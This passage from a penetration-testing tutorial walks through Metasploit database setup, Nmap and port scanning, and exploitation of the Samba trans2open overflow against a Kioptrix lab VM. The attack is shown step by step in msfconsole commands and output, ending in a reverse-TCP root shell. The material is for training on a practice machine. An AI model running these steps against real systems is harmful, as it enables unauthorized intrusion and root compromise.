The Metasploit™ framework is incredible. It offers penetration testers a wide variety of tools in a friendly, easy to use manner. It was originally created by HD Moore and has been purchased by Rapid7, the creators of the Nexpose vulnerability scanner toolkit. Everything that we have done manually can be done with Metasploit.
Tip
If you are new to penetration testing, I highly recommend that you go through the free training provided at http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training to get a really good grasp of how powerful this framework really is. This site is constantly updated and should be visited frequently to find information about the latest additions to the MSF framework.
In this book, we restrict our scope to some of the more interesting features of the MSF framework to highlight the efficiency it adds to the work a penetration tester must do. Starting with the Kali 2.0 Version, the Metasploit tool no longer comes as a service and requires some configuration before running. Enter the following command:
# /etc/init.d/postgresql start # /msfdbinit # msfconsole
This command will yield output similar to the following:
_ _ / / __ _ __ /_/ __ | | / | _____ ___ _____ | | / _ | | /| | | ___ |- -| / / __ | -__/ | | | | || | |- -| |_| | | | _|__ | |_ / - __ | | | |_ \__/ | | | |_ |/ |____/ \___/ / \___/ / \__| |_ \___ =[metasploitv4.11.2-dev [core:4.2api:1.0] + -- --=[1454 exploits - 829 auxiliary - 229 post + -- --=[376 payloads - 37 en coders - 8 nops msf>
One of the favorite Metasploit features is the ability to have all of your results dumped into a database. Metasploit uses PostgreSQL by default. In a new terminal window enter the following:
# su postgres -c psql psql (9.4.3) Type "help" for help.
We will now change the password for the default database user:
postgres=# ALTER USER postgres WITH PASSWORD 'myPassword'; ALTER ROLE
Here, we changed the password for the postgres role. We will use q to exit the postgres console.
postgres=# q
At the msf> prompt, type the following:
Msf>db_disconnect msf>db_connect postgres:[email protected]/pentester msf>db_status [*] postgresql connected to postgres
Now, we know that we are connected to the PostgreSQL database named pentester. We can verify connectivity by typing:
msf> hosts Hosts ===== address mac name os_nameos_flavoros_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- --------
The previous command will provide us with a listing of hosts. As you can see, there is nothing interesting just yet.
We need something exciting to display when running the hosts command, so let's run a quick Nmap scan to collect some data. With msfconsole open and the database connected, we can now run our Nmap scans directly from within Metasploit.
msf> db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.75.14
The results look very familiar with the added bonus of having been added to the database for future reference:
[*] Nmap: Starting Nmap6.49BETA4( https://nmap.org ) at 2015-08-04 21:47 EDT [*] Nmap: Nmap scan report for 192.168.75.14 [*] Nmap: Host is up (0.00059s latency). [*] Nmap: PORT STATE SERVICE [*] Nmap: 22/tcp open ssh [*] Nmap: 80/tcp open http [*] Nmap: 111/tcp open rpcbind [*] Nmap: 139/tcp open netbios-ssn [*] Nmap: 443/tcp open https [*] Nmap: 32768/tcp open filenet-tms [*] Nmap: 111/udp open rpcbind [*] Nmap: 137/udp open netbios-ns [*] Nmap: 32768/udp open|filtered omad [*] Nmap: MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems) [*] Nmap: Warning: OS Scan results may be unreliable because we could not find at least 1 open and 1 closed port [*] Nmap: Device type: general purpose [*] Nmap: Running: Linux 2.4.X [*] Nmap: OS details: Linux 2.4.9 - 2.4.18 (likely embedded) [*] Nmap: Network Distance: 1 hop [*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds
If we run a quick hosts command, we will see that the system has been added to our PostgreSQL pentester database:
msf> hosts Hosts ===== address mac name os_nameos_flavoros_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.75.14 08:00:27:21:21:62 Linux 3.X device
Now that the data is in the database, there are all sorts of handy time-saving tricks that we can perform. For instance, if we would like to see which systems have port 443 open, we can enter:
msf > services -p 443
This provides us with a nicely formatted output listing all the systems with 443:
Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.75.14 443 tcp https open
To use auxiliary modules use the following command:
msf> use auxiliary/scanner/portscan/tcp
The use command instructs Metasploit to use the specified module:
msf auxiliary(tcp) > show options
Every module has a specific set of options that can be displayed via the show options command. This particular module has the following options that can be changed:
Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds
We need to change a few of these to suit our needs:
msf auxiliary(tcp) > set RHOSTS 192.168.75.14
RHOSTS is our target range. We set it to 192.168.75.14:
msf auxiliary(tcp) > set PORTS 1-1024
To save time, we restrict the scan to only the first 1024 ports using the set PORTS setting.
msf auxiliary(tcp) > run
The run command will initiate the scan using our predetermined settings. In a few moments, we will receive feedback from the console:
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
The important item of note here is that all modules operate in the same manner. Once you understand the method of searching for exploits, you will be able to reuse the same steps repeatedly.
The time has come to take a look at using Metasploit to perform an attack against our Kioptrix machine. As we understand how to compile and use proof of concept code that is made available on the Internet, we will be able to quickly appreciate the time savings that Metasploit provides. We will begin by connecting to our database.
# msfconsole msf > db_connect postgres:[email protected]/pentester
We should already have some information in our database. This can be verified using:
msf > services
This command provides us with the following output:
Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.75.14 22 tcp ssh open 192.168.75.14 80 tcp http open 192.168.75.14 111 udp rpcbind open 192.168.75.14 111 tcp rpcbind open 192.168.75.14 137 udp netbios-ns open 192.168.75.14 139 tcp netbios-ssn open 192.168.75.14 443 tcp https open 192.168.75.14 32768 tcp filenet-tms open 192.168.75.14 32768 udp omad open
When reviewing these ports, we find our previously exploited samba port 139, which is still open. Now, it is time to see what we can do without having to reformat the exploit code.
msf> search samba
This results in the following:
- Name: The name column will be used in correlation with the
usecommand once we decide which exploit to try - Disclosure: The disclosure date is the actual date that the exploit was made known to the community or the vendor, not when the proof of concept code was released
- Rank: This is very important since it indicates just how reliable the exploit is known to be
- Description is well… the description of the type of exploit this is
We will be using the trans2open exploit as it is similar to what we performed manually earlier in the chapter. In msfconsole, type:
msf > use exploit/linux/samba/trans2open
When more information regarding an exploit is needed, we can use the info command to receive the following output:
msf exploit(trans2open) > info Name: Samba trans2open Overflow (Linux x86) Module: exploit/linux/samba/trans2open Platform: Linux Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2003-04-07 Provided by: hdm<[email protected]> jduck<[email protected]> Available targets: Id Name -- ---- 0 Samba 2.2.x - Bruteforce Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Payload information: Space: 1024 Avoid: 1 characters Description: This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. References: http://cvedetails.com/2003-0201 http://www.osvdb.org/4469 http://www.securityfocus.com/bid/7294 http://seclists.org/bugtraq/2003/Apr/103
This information is available for all of the exploits in Metasploit. When time permits, taking the time to familiarize yourself with some of the most commonly used exploits would be very beneficial in the long term, as you will be able to avoid trying exploits that do not work on production systems.
Now, we need to set some of the options that are available:
msf > set RHOST 192.168.75.14
RHOST is the remote hosts and needs to be set to our Kioptrix machine's IP address.
msf > show payloads
An example of the output of this command is shown in the following image:
The show payloads command provides a listing of all of the compatible payloads that can be used with this particular exploit. We will make use of reverse_tcp for this example. This payload type is small and usually effective, although it does not have the full range of options available that Meterpreter does.
> set payload linux/x86/shell/reverse_tcp
We will also have to set the LHOST and LPORT.
> set LHOST 192.168.75.12
This is our localhost that the listener will be set up on.
> set LPORT 2222
This is the port that we would like to listen on.
Now that is out of the way, we can move on to exploitation:
> exploit
If all goes as planned, you will receive the following confirmation and an open session that is very similar to the connection our manually compiled exploit provided us with earlier in the chapter.
msf exploit(trans2open) > exploit [*] Started reverse handler on 192.168.75.12:2221 [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Sending stage (36 bytes) to 192.168.75.14 [*] Command shell session 2 opened (192.168.75.12:2221 -> 192.168.75.14:32802) at 2015-08-04 23:22:06 -0500
To ensure that we have root, we will perform the following commands:
# mail Mail version 8.1 6/6/93. Type ?for help. "/var/mail/root": 6 messages 6 unread >U 1 [email protected] Sat Sep 26 11:42 15/481 "About Level 2" U 2 [email protected] Thu Nov 10 19:34 19/534 "LogWatch for kioptrix" U 3 [email protected] Fri Nov 11 14:38 48/1235 "LogWatch for kioptrix" U 4 [email protected] Sun Nov 13 15:12 19/534 "LogWatch for kioptrix" U 5 [email protected] Mon Nov 14 18:23 244/12279 "LogWatch for kioptrix" U 6 [email protected] Wed Nov 16 15:19 19/534 "LogWatch for kioptrix"
We are looking at the messages for the root account and can see that Loneferret has left us a nice little message; type 1 to read it:
# 1 Message 1: From root Sat Sep 26 11:42:10 2009 Date: Tue, 04 Aug 2015 11:42:10 -0400 From: root <[email protected]> To: [email protected] Subject: About Level 2 If you are reading this, you got root. Congratulations. Level 2 won't be as easy...
This last exercise should have made it clear that, compared to manually finding and compiling code, using Metasploit is a breeze. The best part about it is that you will be able to add your own modules and compiled code to the framework as well.